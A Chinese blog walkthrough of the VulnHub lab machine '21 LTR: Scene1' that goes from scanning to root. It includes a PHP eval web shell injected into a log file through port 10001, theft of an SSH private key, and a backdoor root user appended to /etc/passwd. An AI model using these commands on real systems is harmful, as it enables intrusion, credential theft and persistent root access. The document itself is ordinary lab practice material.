vulnhub靶机:21 LTR: Scene1

下载

下载地址:https://www.vulnhub.com/entry/21ltr-scene-1,3/

导入靶机

一直按默认的来,一直下一步

修改网卡

修改靶机和 kali 攻击机网络模式为仅主机模式

把仅主机模式的 IP 修改为 192.168.2.0

信息收集

主机发现

arp-scan -l

靶机 IP 是 192.168.2.120

端口扫描

nmap -p- 192.168.2.120

目录扫描

python3 dirsearch.py -u "192.168.2.120"

访问 web

查看页面源代码,发现账号和密码

尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件

ftp 192.168.2.120
logs								# 账号
zg]E-b0]+8:(58G			# 密码

下载下来

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

拼接到刚才扫描到的 logs 目录下,发现可以访问到日志文件 /logs/backup_log.php

上传一句话木马

尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

telnet 192.168.2.120 10001
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

查看一下敏感文件

因为有ssh服务,就读取一下密钥,把密钥下载下来拖进 kali 桌面

/media/USB_1/Stuff/Keys/id_rsa

赋予权限,然后ssh登录

chmod 600 id_rsa
ssh -i id_rsa hbeale@192.168.2.120

要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)

将一下内容写入config

cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

提权

查看用户文件

cat /etc/passwd

另起一个终端

openssl passwd 123456

用 $1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3. 替换 root:x:0:0::/root:/bin/bash 中的 x

并新起一个名字 newt

newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash

把它写入/etc/passwd

echo 'newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash' >> /etc/passwd
cat /etc/passwd

提权成功

su newt
123456

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值